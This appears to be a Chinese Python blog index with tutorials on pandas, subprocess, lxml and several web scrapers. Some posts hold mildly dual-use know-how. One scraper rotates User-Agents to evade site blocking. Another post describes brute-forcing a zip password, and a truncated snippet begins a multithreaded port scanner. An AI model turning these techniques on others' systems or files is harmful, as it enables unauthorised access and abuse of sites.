ubuntu的pycharm中文注释显示乱码 ?

回复

李魔佛 回复了问题 • 1 人关注 • 1 个回复 • 10498 次浏览 • 2016-07-25 12:22 • 来自相关话题

python sqlite 插入的数据含有变量,结果不一致

回复

李魔佛 回复了问题 • 1 人关注 • 1 个回复 • 7551 次浏览 • 2016-07-18 07:50 • 来自相关话题

使用pandas的dataframe数据进行操作的总结

李魔佛 发表了文章 • 0 个评论 • 5650 次浏览 • 2016-07-17 16:47 • 来自相关话题

t = df.iloc[0]
# type(t) 是 <class 'pandas.core.series.Series'>
 
# 使用iloc取出单行后,t已经不再是DataFrame,而是一个Series。
# 此时 t['high'] 返回的是一个标量值;t.index 返回的则是原来df的列名。
 
t = df[:1]
# type(t) 是 <class 'pandas.core.frame.DataFrame'>
 
# 切片返回的是DataFrame的一个子集,此时可以继续用DataFrame的各种方法进行操作。
 
 
 
 
 
删除dataframe中某一行
 
df.drop()
 
df的内容如下:

(图:drop.PNG,df 的内容)

 
    df.drop(df[df[u'代码']==300141.0].index,inplace=True)
    print df
 
输出如下

(图:after_drop.PNG,删除后的输出)

 
记得加上参数 inplace=True。它的默认值是 inplace=False,即不加这个参数时原来的df不会被修改,drop只会返回删除后的新DataFrame,需要用一个新变量来接收:
new_df=df.drop(df[df[u'代码']==300141.0].index)
 

判断DataFrame为None
 
    if df is None:
        print "None len==0"
        return False
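
下面补充一个可以直接运行的小例子,把上面几点串起来(其中的列名 u'代码'、'high' 和数值只是演示用的假设数据):

import pandas as pd

df = pd.DataFrame({u'代码': [300141.0, 600001.0], 'high': [10.5, 8.8]})

t = df.iloc[0]    # Series,t['high'] 得到标量,t.index 是原来的列名
s = df[:1]        # 仍然是 DataFrame

new_df = df.drop(df[df[u'代码'] == 300141.0].index)       # 不加inplace,返回删除后的新DataFrame
df.drop(df[df[u'代码'] == 300141.0].index, inplace=True)  # 加inplace=True,原地删除

print type(t), type(s)
print new_df
print df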

 

pycharm 添加了中文注释后无法运行?

回复

李魔佛 回复了问题 • 1 人关注 • 1 个回复 • 6154 次浏览 • 2016-07-14 17:56 • 来自相关话题

python 爬虫下载的图片打不开?

李魔佛 发表了文章 • 0 个评论 • 6848 次浏览 • 2016-07-09 17:33 • 来自相关话题

 
 
代码如下片段
 
__author__ = 'rocky'
import urllib,urllib2,StringIO,gzip
url="http://image.xitek.com/photo/2 ... ot%3B
filname=url.split("/")[-1]
req=urllib2.Request(url)
resp=urllib2.urlopen(req)
content=resp.read()
#data = StringIO.StringIO(content)
#gzipper = gzip.GzipFile(fileobj=data)
#html = gzipper.read()
f=open(filname,'w')
f.write(content)
f.close()

运行后生成的文件打开后不显示图片。
 
后来调试后发现,要保存图片这类二进制文件,打开文件时需要用 'wb' 模式,也就是把上面代码中的
f=open(filname,'w') 改成

f=open(filname,'wb')
 
就可以了。
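
顺带一提,如果只是想把图片保存到本地,也可以直接用 urllib.urlretrieve,一步到位(下面是示意写法,URL只是占位):

import urllib

url = "http://example.com/some.jpg"   # 占位URL,换成实际的图片地址
filname = url.split("/")[-1]
urllib.urlretrieve(url, filname)      # 内部以二进制方式写入,不存在'w'/'wb'的问题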
 

判断网页内容是否经过gzip压缩 python代码

李魔佛 发表了文章 • 0 个评论 • 3758 次浏览 • 2016-07-09 15:10 • 来自相关话题

同一个网站的某些页面会用gzip压缩网页内容,给普通爬虫造成一定的干扰。
 
那么可以在代码中加一个判断:先判断网页内容是否经过gzip压缩,是的话多做一步解压处理就可以了。
 

(图:gzip.PNG)
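
判断的思路大致如下,这里给出一个基于urllib2的最小示意(URL只是占位,并非原图中的代码,仅演示判断和解压的流程):

import urllib2, gzip, StringIO

req = urllib2.Request("http://example.com/")   # 占位URL
resp = urllib2.urlopen(req)
content = resp.read()

# 通过响应头 Content-Encoding 判断是否经过gzip压缩
if resp.info().get("Content-Encoding") == "gzip":
    buf = StringIO.StringIO(content)
    content = gzip.GzipFile(fileobj=buf).read()   # 解压后才是真正的html

print content[:100]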

 

python 编写火车票抢票软件

李魔佛 发表了文章 • 2 个评论 • 13813 次浏览 • 2016-06-30 15:55 • 来自相关话题

项目:python 编写火车票抢票软件
实现日期:2016.7.30

python 获取 中国证券网 的公告

python爬虫李魔佛 发表了文章 • 11 个评论 • 20763 次浏览 • 2016-06-30 15:45 • 来自相关话题

中国证券网: http://ggjd.cnstock.com/
这个网站的公告会比同花顺东方财富的早一点,而且还出现过早上中国证券网已经发了公告,而东财却拿去做午间公告,以至于可以提前获取公告提前埋伏。
 
现在程序自动把抓取的公告存入本网站中:http://30daydo.com/news.php 
每天早上8:30更新一次。
 
生成的公告保存在stock/文件夹下,以日期命名。 下面的脚本会循环检测,如果有新的公告就会继续生成。
 
默认保存前3页的公告。(一次抓太多页会被网站暂时屏蔽几分钟)。 代码中已经使用了随机切换header的办法来躲避网站的封杀。
 
修改 getInfo(3) 里面的数字就可以抓取前面若干页的数据。
 
 

(图:公告.PNG)
__author__ = 'rocchen'
# working v1.0
from bs4 import BeautifulSoup
import urllib2, datetime, time, codecs, cookielib, random, threading
import os, sys


def getInfo(max_index_user=5):
    stock_news_site = "http://ggjd.cnstock.com/gglist/search/ggkx/"

    my_userAgent = [
        'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
        'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
        'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',
        'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)',
        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
        'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
        'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11',
        'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',
        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)',
        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)']
    index = 0
    max_index = max_index_user
    num = 1
    temp_time = time.strftime("[%Y-%m-%d]-[%H-%M]", time.localtime())

    store_filename = "StockNews-%s.log" % temp_time
    fOpen = codecs.open(store_filename, 'w', 'utf-8')

    while index < max_index:
        # 每次请求随机换一个User-Agent,躲避网站封杀
        user_agent = random.choice(my_userAgent)
        # print user_agent
        company_news_site = stock_news_site + str(index)
        # content = urllib2.urlopen(company_news_site)
        headers = {'User-Agent': user_agent, 'Host': "ggjd.cnstock.com", 'DNT': '1',
                   'Accept': 'text/html, application/xhtml+xml, */*', }
        req = urllib2.Request(url=company_news_site, headers=headers)
        resp = None
        raw_content = ""
        try:
            resp = urllib2.urlopen(req, timeout=30)

        except urllib2.HTTPError as e:
            e.fp.read()
        except urllib2.URLError as e:
            if hasattr(e, 'code'):
                print "error code %d" % e.code
            elif hasattr(e, 'reason'):
                print "error reason %s " % e.reason

        finally:
            # resp 可能为 None(请求失败),先判断再读取和关闭
            if resp:
                raw_content = resp.read()
                resp.close()
            time.sleep(2)

        soup = BeautifulSoup(raw_content, "html.parser")
        all_content = soup.find_all("span", "time")

        for i in all_content:
            news_time = i.string
            node = i.next_sibling
            str_temp = "No.%s \n%s\t%s\n---> %s \n\n" % (str(num), news_time, node['title'], node['href'])
            # print "inside %d" % num
            # print str_temp
            fOpen.write(str_temp)
            num = num + 1

        # print "index %d" % index
        index = index + 1

    fOpen.close()


def execute_task(n=60):
    period = int(n)
    while True:
        print datetime.datetime.now()
        getInfo(3)

        time.sleep(60 * period)


if __name__ == "__main__":

    sub_folder = os.path.join(os.getcwd(), "stock")
    if not os.path.exists(sub_folder):
        os.mkdir(sub_folder)
    os.chdir(sub_folder)
    start_time = time.time()  # user can change the max index number getInfo(10), by default is getInfo(5)
    if len(sys.argv) < 2:
        n = raw_input("Input Period : ? mins to download every cycle")
    else:
        n = int(sys.argv[1])
    execute_task(n)
    end_time = time.time()
    print "Total time: %s s." % str(round((end_time - start_time), 4))


 
github:https://github.com/Rockyzsu/cnstock
 

为什么beautifulsoup的children不能用列表索引index去返回值 ?

回复

李魔佛 回复了问题 • 1 人关注 • 1 个回复 • 6142 次浏览 • 2016-06-29 22:10 • 来自相关话题

python 下使用beautifulsoup还是lxml ?

李魔佛 发表了文章 • 0 个评论 • 7328 次浏览 • 2016-06-29 18:29 • 来自相关话题

刚开始接触爬虫是从beautifulsoup开始的,觉得beautifulsoup很好用。 然后后面又因为使用scrapy的缘故,接触到lxml。 到底哪一个更加好用?
 
然后看了下beautifulsoup的源码,它的实现原理使用的是正则表达式,而lxml使用的是节点递归的技术。
 

Don't use BeautifulSoup, use lxml.soupparser then you're sitting on top of the power of lxml and can use the good bits of BeautifulSoup which is to deal with really broken and crappy HTML.
 
 
 
In summary, lxml is positioned as a lightning-fast production-quality html and xml parser that, by the way, also includes a soupparser module to fall back on BeautifulSoup's functionality. BeautifulSoup is a one-person project, designed to save you time to quickly extract data out of poorly-formed html or xml.
lxml documentation says that both parsers have advantages and disadvantages. For this reason, lxml provides a soupparser so you can switch back and forth. Quoting,
BeautifulSoup uses a different parsing approach. It is not a real HTML parser but uses regular expressions to dive through tag soup. It is therefore more forgiving in some cases and less good in others. It is not uncommon that lxml/libxml2 parses and fixes broken HTML better, but BeautifulSoup has superiour support for encoding detection. It very much depends on the input which parser works better.

In the end they are saying,

The downside of using this parser is that it is much slower than the HTML parser of lxml. So if performance matters, you might want to consider using soupparser only as a fallback for certain cases.

If I understand them correctly, it means that the soup parser is more robust --- it can deal with a "soup" of malformed tags by using regular expressions --- whereas lxml is more straightforward and just parses things and builds a tree as you would expect. I assume it also applies to BeautifulSoup itself, not just to the soupparser for lxml.
They also show how to benefit from BeautifulSoup's encoding detection, while still parsing quickly with lxml:
>>> from BeautifulSoup import UnicodeDammit

>>> def decode_html(html_string):
... converted = UnicodeDammit(html_string, isHTML=True)
... if not converted.unicode:
... raise UnicodeDecodeError(
... "Failed to detect encoding, tried [%s]",
... ', '.join(converted.triedEncodings))
... # print converted.originalEncoding
... return converted.unicode

>>> root = lxml.html.fromstring(decode_html(tag_soup))
(Same source: http://lxml.de/elementsoup.html).
In words of BeautifulSoup's creator,

That's it! Have fun! I wrote Beautiful Soup to save everybody time. Once you get used to it, you should be able to wrangle data out of poorly-designed websites in just a few minutes. Send me email if you have any comments, run into problems, or want me to know about your project that uses Beautiful Soup. --Leonard

Quoted from the Beautiful Soup documentation.
I hope this is now clear. The soup is a brilliant one-person project designed to save you time to extract data out of poorly-designed websites. The goal is to save you time right now, to get the job done, not necessarily to save you time in the long term, and definitely not to optimize the performance of your software.
Also, from the lxml website,

lxml has been downloaded from the Python Package Index more than two million times and is also available directly in many package distributions, e.g. for Linux or MacOS-X.

And, from Why lxml?,

The C libraries libxml2 and libxslt have huge benefits:... Standards-compliant... Full-featured... fast. fast! FAST! ... lxml is a new Python binding for libxml2 and libxslt...

意思大概就是:不要用BeautifulSoup,用lxml,lxml才能让你体会到html节点解析的速度之快。
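
补一个两种写法对照的小例子,解析同一段不规范的HTML(仅为示意):

from bs4 import BeautifulSoup
from lxml import etree

broken_html = "<div><p>hello<p>world</div>"

soup = BeautifulSoup(broken_html, "html.parser")
print soup.find_all("p")[1].get_text()      # world

tree = etree.HTML(broken_html)
print tree.xpath("//p[2]/text()")[0]        # world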
 

python 批量获取色影无忌 获奖图片

python爬虫李魔佛 发表了文章 • 6 个评论 • 15993 次浏览 • 2016-06-29 16:41 • 来自相关话题

色影无忌上的图片很多都可以直接拿来做壁纸的,而且发布面不会太广,基本不会和市面上大部分的壁纸或者图片素材重复。 关键还没有水印。 这么良心的图片服务商哪里找呀~~
 

 

(图:色影无忌_副本.png)

 
不多说,直接来代码:
#-*-coding=utf-8-*-
__author__ = 'rocky chen'
from bs4 import BeautifulSoup
import urllib2,sys,StringIO,gzip,time,random,re,urllib,os
reload(sys)
sys.setdefaultencoding('utf-8')
class Xitek():
    def __init__(self):
        self.url="http://photo.xitek.com/"
        user_agent="Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
        self.headers={"User-Agent":user_agent}
        self.last_page=self.__get_last_page()


    def __get_last_page(self):
        html=self.__getContentAuto(self.url)
        bs=BeautifulSoup(html,"html.parser")
        page=bs.find_all('a',class_="blast")
        last_page=page[0]['href'].split('/')[-1]
        return int(last_page)


    def __getContentAuto(self,url):
        req=urllib2.Request(url,headers=self.headers)
        resp=urllib2.urlopen(req)
        #time.sleep(2*random.random())
        content=resp.read()
        info=resp.info().get("Content-Encoding")
        if info==None:
            return content
        else:
            t=StringIO.StringIO(content)
            gziper=gzip.GzipFile(fileobj=t)
            html = gziper.read()
            return html

    #def __getFileName(self,stream):


    def __download(self,url):
        p=re.compile(r'href="(/photoid/\d+)"')
        #html=self.__getContentNoZip(url)

        html=self.__getContentAuto(url)

        content = p.findall(html)
        for i in content:
            print i

            photoid=self.__getContentAuto(self.url+i)
            bs=BeautifulSoup(photoid,"html.parser")
            final_link=bs.find('img',class_="mimg")['src']
            print final_link
            #pic_stream=self.__getContentAuto(final_link)
            title=bs.title.string.strip()
            filename = re.sub('[\/:*?"<>|]', '-', title)
            filename=filename+'.jpg'
            urllib.urlretrieve(final_link,filename)
            #f=open(filename,'w')
            #f.write(pic_stream)
            #f.close()
        #print html
        #bs=BeautifulSoup(html,"html.parser")
        #content=bs.find_all(p)
        #for i in content:
        #    print i
        '''
        print bs.title
        element_link=bs.find_all('div',class_="element")
        print len(element_link)
        k=1
        for href in element_link:

            #print type(href)
            #print href.tag
        '''
        '''
            if href.children[0]:
                print href.children[0]
        '''
        '''
            t=0

            for i in href.children:
                #if i.a:
                if t==0:
                    #print k
                    if i['href']
                    print link

                        if p.findall(link):
                            full_path=self.url[0:len(self.url)-1]+link
                            sub_html=self.__getContent(full_path)
                            bs=BeautifulSoup(sub_html,"html.parser")
                            final_link=bs.find('img',class_="mimg")['src']
                            #time.sleep(2*random.random())
                            print final_link
                    #k=k+1
                #print type(i)
                #print i.tag
                #if hasattr(i,"href"):
                    #print i['href']
                #print i.tag
                t=t+1
                #print "*"

        '''

        '''
            if href:
                if href.children:
                    print href.children[0]
        '''
            #print "one element link"



    def getPhoto(self):

        start=0
        #use style/0
        photo_url="http://photo.xitek.com/style/0/p/"
        for i in range(start,self.last_page+1):
            url=photo_url+str(i)
            print url
            #time.sleep(1)
            self.__download(url)

        '''
        url="http://photo.xitek.com/style/0/p/10"
        self.__download(url)
        '''
        #url="http://photo.xitek.com/style/0/p/0"
        #html=self.__getContent(url)
        #url="http://photo.xitek.com/"
        #html=self.__getContentNoZip(url)
        #print html
        #'''
def main():
    sub_folder = os.path.join(os.getcwd(), "content")
    if not os.path.exists(sub_folder):
        os.mkdir(sub_folder)
    os.chdir(sub_folder)
    obj=Xitek()
    obj.getPhoto()


if __name__=="__main__":
    main()








运行后脚本会自动把所有图片抓取到content文件夹下。 (色影无忌的服务器没有做任何屏蔽处理,所以脚本不要跑得太快,可以适当调用sleep函数,不要给服务器太大压力)
 
已经下载好的图片:

(图:色影无忌2_副本1.png,已经下载好的图片)

 
 
github: https://github.com/Rockyzsu/fetchXitek   (欢迎前来star)

python获取列表中的最大值

李魔佛 发表了文章 • 0 个评论 • 4745 次浏览 • 2016-06-29 16:35 • 来自相关话题

其实python提供了内置的max函数,直接调用即可。
 
list = [1, 2, 3, 5, 4, 6, 434, 2323, 333, 99999]   # 注意:用list做变量名会覆盖内置的list,实际代码里最好换个名字
print "max of list is ",
print max(list)

输出 99999
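
max 还可以带 key 参数,按自定义规则取"最大"的元素(示例):

words = ['python', 'go', 'javascript']
print max(words, key=len)    # 输出 javascript,按长度比较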

python使用lxml加载 html---xpath

李魔佛 发表了文章 • 0 个评论 • 2688 次浏览 • 2016-06-23 22:09 • 来自相关话题

首先确定安装了lxml。
然后按照以下代码去使用
 
#-*-coding=utf-8-*-
__author__ = 'rocchen'
from lxml import html
from lxml import etree
import urllib2

def lxml_test():
    url = "http://www.caixunzz.com"
    req = urllib2.Request(url=url)
    resp = urllib2.urlopen(req)
    # print resp.read()

    tree = etree.HTML(resp.read())
    href = tree.xpath('//a[@class="label"]/@href')
    # print href.tag
    for i in href:
        # print html.tostring(i)
        # print type(i)
        print i

    print type(href)

lxml_test()

使用urllib2读取了网页内容,然后导入到lxml,为的就是使用xpath这个方便的函数,比单纯使用beautifulsoup要方便得多。(个人认为)
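
如果不想依赖网络,也可以直接解析一段HTML字符串来体会xpath的写法(示意代码,HTML内容是随手构造的):

from lxml import etree

html_text = '<div><a class="label" href="/a">first</a><a class="label" href="/b">second</a></div>'
tree = etree.HTML(html_text)
print tree.xpath('//a[@class="label"]/@href')    # ['/a', '/b']
print tree.xpath('//a[@class="label"]/text()')   # ['first', 'second']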

scrapy 爬虫执行之前 如何运行自定义的函数来初始化一些数据?

回复

低调的哥哥 回复了问题 • 2 人关注 • 1 个回复 • 9049 次浏览 • 2016-06-20 18:25 • 来自相关话题

python中字典赋值常见错误

李魔佛 发表了文章 • 0 个评论 • 3471 次浏览 • 2016-06-19 11:39 • 来自相关话题

初学Python,在学到字典时,出现了一个疑问,见下两个算例:
算例一:
>>> x = { }
>>> y = x
>>> x = { 'a' : 'b' }
>>> y
{ }

算例二:
>>> x = { }
>>> y = x
>>> x['a'] = 'b'
>>> y
{ 'a' : 'b' }


疑问:为什么算例一中,给x赋值后,y没变(还是空字典),而算例二中,对x进行添加项的操作后,y就会同步变化。
 
 
解答:

y = x 之后,x、y 引用的是同一个字典对象。
算例一中,x = { 'a' : 'b' } 让 x 重新指向了一个新的字典对象,y 仍然指向原来的空字典,所以 y 没有变化。
算例二中,x['a'] = 'b' 是在原字典对象上做修改,x、y 引用的还是同一个字典,所以 y 会同步变化。

可以用 id(x)、id(y) 来验证:如果 id() 函数的返回值相同,说明两者引用的是同一个对象。
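
按这个思路,可以在交互环境里这样验证(示意):

>>> x = {}
>>> y = x
>>> id(x) == id(y)    # 同一个对象
True
>>> x = {'a': 'b'}    # x 重新绑定到新对象,y 不受影响
>>> id(x) == id(y)
False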


 

ubuntu12.04 安装 scrapy 爬虫模块 一系列问题与解决办法

回复

李魔佛 发起了问题 • 1 人关注 • 0 个回复 • 4987 次浏览 • 2016-06-16 16:18 • 来自相关话题

subprocess popen 使用PIPE 阻塞进程,导致程序无法继续运行

李魔佛 发表了文章 • 0 个评论 • 8875 次浏览 • 2016-06-12 18:31 • 来自相关话题

 
 
subprocess用于在python内部创建一个子进程,比如调用shell脚本等。

举例:
import subprocess

# cmd 为要执行的shell命令字符串(示例)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
p.wait()
# 如果子进程往stdout写的内容太多,这里会一直阻塞(hang)
print "finished"


在python的官方文档中对这个进行了解释:http://docs.python.org/2/library/subprocess.html

原因是stdout产生的内容太多,超过了系统的buffer

解决方法是使用communicate()方法。
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
stdout, stderr = p.communicate()   # communicate()会把输出读完并等待子进程结束,不会因为buffer写满而卡住
p.wait()
print "Finish"

抓取 知乎日报 中的 大误 系类文章,生成电子书推送到kindle

python爬虫李魔佛 发表了文章 • 0 个评论 • 8803 次浏览 • 2016-06-12 08:52 • 来自相关话题

无意中看了知乎日报的大误系列的一篇文章,之后就停不下来了,大误是虚构故事,知乎上神人虚构故事的功力要高于网络上的很多写手啊!! 看得欲罢不能,不过还是那句,手机屏幕太小,连续看几个小时很疲劳,而且每次都要联网去看。 
 
所以写了下面的python脚本,一劳永逸。 脚本抓取大误从开始到现在的所有文章,并推送到你自己的kindle账号。
 

(图:大误.JPG)
# -*- coding=utf-8 -*-
__author__ = 'rocky @ www.30daydo.com'
import urllib2, re, os, codecs, sys, datetime
from bs4 import BeautifulSoup
# example https://zhhrb.sinaapp.com/index.php?date=20160610
from mail_template import MailAtt
reload(sys)
sys.setdefaultencoding('utf-8')

def save2file(filename, content):
    filename = filename + ".txt"
    f = codecs.open(filename, 'a', encoding='utf-8')
    f.write(content)
    f.close()


def getPost(date_time, filter_p):
    url = 'https://zhhrb.sinaapp.com/index.php?date=' + date_time
    user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    header = {"User-Agent": user_agent}
    req = urllib2.Request(url, headers=header)
    resp = urllib2.urlopen(req)
    content = resp.read()
    p = re.compile('<h2 class="question-title">(.*)</h2></br></a>')
    result = re.findall(p, content)
    count = -1
    row = -1
    for i in result:
        # print i
        return_content = re.findall(filter_p, i)

        if return_content:
            row = count
            break
        # print return_content[0]
        count = count + 1
    # print row
    if row == -1:
        return 0
    link_p = re.compile('<a href="(.*)" target="_blank" rel="nofollow">')
    link_result = re.findall(link_p, content)[row + 1]
    print link_result
    result_req = urllib2.Request(link_result, headers=header)
    result_resp = urllib2.urlopen(result_req)
    # result_content = result_resp.read()
    # print result_content

    bs = BeautifulSoup(result_resp, "html.parser")
    title = bs.title.string.strip()
    # print title
    filename = re.sub('[\/:*?"<>|]', '-', title)
    print filename
    print date_time
    save2file(filename, title)
    save2file(filename, "\n\n\n\n--------------------%s Detail----------------------\n\n" % date_time)

    detail_content = bs.find_all('div', class_='content')

    for i in detail_content:
        # print i
        save2file(filename, "\n\n-------------------------answer -------------------------\n\n")
        for j in i.strings:
            save2file(filename, j)

    smtp_server = 'smtp.126.com'
    from_mail = sys.argv[1]
    password = sys.argv[2]
    to_mail = 'xxxxx@kindle.cn'
    send_kindle = MailAtt(smtp_server, from_mail, password, to_mail)
    send_kindle.send_txt(filename)


def main():
    sub_folder = os.path.join(os.getcwd(), "content")
    if not os.path.exists(sub_folder):
        os.mkdir(sub_folder)
    os.chdir(sub_folder)

    date_time = '20160611'
    filter_p = re.compile('大误.*')
    ori_day = datetime.date(datetime.date.today().year, 01, 01)
    t = datetime.date(datetime.date.today().year, datetime.date.today().month, datetime.date.today().day)
    delta = (t - ori_day).days
    print delta
    for i in range(delta):
        day = datetime.date(datetime.date.today().year, 01, 01) + datetime.timedelta(i)
        getPost(day.strftime("%Y%m%d"), filter_p)
    # getPost(date_time, filter_p)

if __name__ == "__main__":
    main()




github: https://github.com/Rockyzsu/zhihu_daily__kindle
 
上面的代码可以稍作修改,就可以抓取瞎扯或者深夜食堂的系列文章。
 
附福利:
http://pan.baidu.com/s/1kVewz59
所有的知乎日报的大误文章。(截止2016/6/12日)

mac os x安装pip?

回复

李魔佛 回复了问题 • 1 人关注 • 1 个回复 • 4499 次浏览 • 2016-06-10 17:19 • 来自相关话题

python 破解zip压缩文件密码

李魔佛 发表了文章 • 0 个评论 • 8817 次浏览 • 2016-06-09 21:43 • 来自相关话题

出于对百度网盘的不信任,加上前阵子百度会把一些侵犯版权的文件清理掉或者一些百度认为的尺度过大的文件进行替换,留下一个4秒的教育视频。 为何不提前告诉用户? 擅自把用户的资料删除,以后用户哪敢随意把资料上传上去呢?
 
抱怨归抱怨,由于现在金山快盘、新浪微盘都关闭了,速度稍微快点的就只有百度网盘了。 所以我会把文件事先压缩好,加个密码然后上传。
 
可是有时候下载下来却忘记了解压密码,实在蛋疼。 所以需要自己逐一验证密码。 所以就写了这个小脚本。 很简单,没啥技术含量。 
 

(图:crash_zip.JPG,破解zip密码的代码截图)

 
 
代码就用图片吧,大家可以上机自己敲敲代码也好。 ctrl+v 代码 其实会养成一种惰性。
 
github: https://github.com/Rockyzsu/zip_crash
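
如果想参考思路,下面给出一个原理类似的最小示意(基于标准库zipfile,文件名都是假设的,并非图中原代码):

import zipfile

zfile = zipfile.ZipFile('test.zip')        # 假设的加密压缩包
with open('passwords.txt') as f:           # 假设的密码字典,每行一个密码
    for line in f:
        password = line.strip()
        try:
            zfile.extractall(pwd=password)   # 密码不对会抛异常
            print "Found password:", password
            break
        except Exception:
            pass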
 

批量删除某个目录下所有子目录的指定后缀的文件

李魔佛 发表了文章 • 0 个评论 • 3921 次浏览 • 2016-06-07 17:51 • 来自相关话题

平时硬盘中下载了大量的image文件,用做刷机。 下载的文件是tgz格式,刷机前需要用 tar zxvf  xxx.tgz 解压。
日积月累,硬盘空间告急,所以写了下面的脚本用来删除指定后缀的解压文件,但源tgz压缩包不能删,因为后续可能还要用它再解压刷机。 如果手动去操作,需要进入每一个文件夹,然后选中tgz,然后反选,然后删除,很费劲。
 
import os

def isContain(des_str, ori_str):
    for i in des_str:
        if ori_str == i:
            return True
    return False


path = os.getcwd()
print path
des_str = ['img', 'cfg', 'bct', 'bin', 'sh', 'dtb', 'txt', 'mk', 'pem', 'mk', 'pk8', 'xml', 'lib', 'pl', 'blob', 'dat']
for fpath, dirs, fname in os.walk(path):
    # print fname

    if fname:
        for i in fname:
            # print i
            name = i.split('.')
            if len(name) >= 2:
                # print name[1]
                if isContain(des_str, name[1]):
                    filepath = os.path.join(fpath, i)
                    print "delete file %s" % filepath
                    os.remove(filepath)

github: https://github.com/Rockyzsu/RmFile
 

python目录递归?

回复

李魔佛 回复了问题 • 1 人关注 • 1 个回复 • 5710 次浏览 • 2016-06-07 17:14 • 来自相关话题

git 使用笔记 或者日常使用中易错的地方?

回复

李魔佛 回复了问题 • 1 人关注 • 1 个回复 • 4840 次浏览 • 2016-06-09 19:02 • 来自相关话题

python雪球爬虫 抓取雪球 大V的所有文章 推送到kindle

python爬虫李魔佛 发表了文章 • 3 个评论 • 20321 次浏览 • 2016-05-29 00:06 • 来自相关话题

30天内完成。 开始日期:2016年5月28日
 
因为雪球上喷子很多,不少大V都不堪忍受,被喷得删帖离开。 比如 易碎品,小小辛巴。
所以利用python可以有效便捷地抓取想要的大V发言内容,并保存到本地,也方便自己检索、考证(有些伪大V喜欢频繁删帖,比如今天预测明天大盘大涨,明天暴跌后就把昨天的预测删掉,给后来者造成该大V每次都能精准预测的错觉)。 
 
下面以 抓取狂龙的帖子为例(狂龙最近老是掀人家庄家的老底,哈)
 
https://xueqiu.com/4742988362 
 
2017年2月20日更新:
爬取雪球上我的收藏的文章,并生成电子书。
(PS:收藏夹中一些文章已经被作者删掉了 - -|, 这速度也蛮快了呀。估计是以前写的现在怕被放出来打脸)
 

(图:雪球的爬虫.PNG)
# -*-coding=utf-8-*-
# 抓取雪球的收藏文章
__author__ = 'Rocky'
import requests, cookielib, re, json, time
from toolkit import Toolkit
from lxml import etree

url = 'https://xueqiu.com/snowman/login'
session = requests.session()

session.cookies = cookielib.LWPCookieJar(filename="cookies")
try:
    session.cookies.load(ignore_discard=True)
except:
    print "Cookie can't load"

agent = 'Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'
headers = {'Host': 'xueqiu.com',
           'Referer': 'https://xueqiu.com/',
           'Origin': 'https://xueqiu.com',
           'User-Agent': agent}
account = Toolkit.getUserData('data.cfg')
print account['snowball_user']
print account['snowball_password']

data = {'username': account['snowball_user'], 'password': account['snowball_password']}
s = session.post(url, data=data, headers=headers)
print s.status_code
# print s.text
session.cookies.save()
fav_temp = 'https://xueqiu.com/favs?page=1'
collection = session.get(fav_temp, headers=headers)
fav_content = collection.text
p = re.compile('"maxPage":(\d+)')
maxPage = p.findall(fav_content)[0]
print maxPage
print type(maxPage)
maxPage = int(maxPage)
print type(maxPage)
for i in range(1, maxPage + 1):
    fav = 'https://xueqiu.com/favs?page=%d' % i
    collection = session.get(fav, headers=headers)
    fav_content = collection.text
    # print fav_content
    p = re.compile('var favs = {(.*?)};', re.S | re.M)
    result = p.findall(fav_content)[0].strip()

    new_result = '{' + result + '}'
    # print type(new_result)
    # print new_result
    data = json.loads(new_result)
    use_data = data['list']
    host = 'https://xueqiu.com'
    for i in use_data:
        url = host + i['target']
        print url
        txt_content = session.get(url, headers=headers).text
        # print txt_content.text

        tree = etree.HTML(txt_content)
        title = tree.xpath('//title/text()')[0]

        filename = re.sub('[\/:*?"<>|]', '-', title)
        print filename

        content = tree.xpath('//div[@class="detail"]')
        for i in content:
            Toolkit.save2filecn(filename, i.xpath('string(.)'))
        # print content
        # Toolkit.save2file(filename,)
        time.sleep(10)





 
用法:
1. snowball.py -- 抓取雪球上我的收藏的文章
使用: 创建一个data.cfg的文件,里面格式如下:
snowball_user=xxxxx@xx.com
snowball_password=密码

然后运行 python snowball.py,会自动登录雪球,并在当前目录生成txt文件。
 
github代码:https://github.com/Rockyzsu/xueqiu

如何快速找到某个模块的帮助或者参数适用 python ?

低调的哥哥 回复了问题 • 2 人关注 • 1 个回复 • 4879 次浏览 • 2016-05-23 23:46 • 来自相关话题

python 多线程扫描开放端口

低调的哥哥 发表了文章 • 0 个评论 • 10181 次浏览 • 2016-05-15 21:15 • 来自相关话题

为什么说python是黑客的语言? 因为很多扫描+破解的任务都可以用python很快的实现,简洁明了。且有大量的库来支持。
import socket, sys
import time
from thread_test import MyThread

socket.setdefaulttimeout(1)
# 设置每个线程socket的timeout时间,超过1秒没有反应就认为端口不开放
thread_num = 4
# 线程数目
ip_end = 256
ip_start = 0
scope = ip_end / thread_num

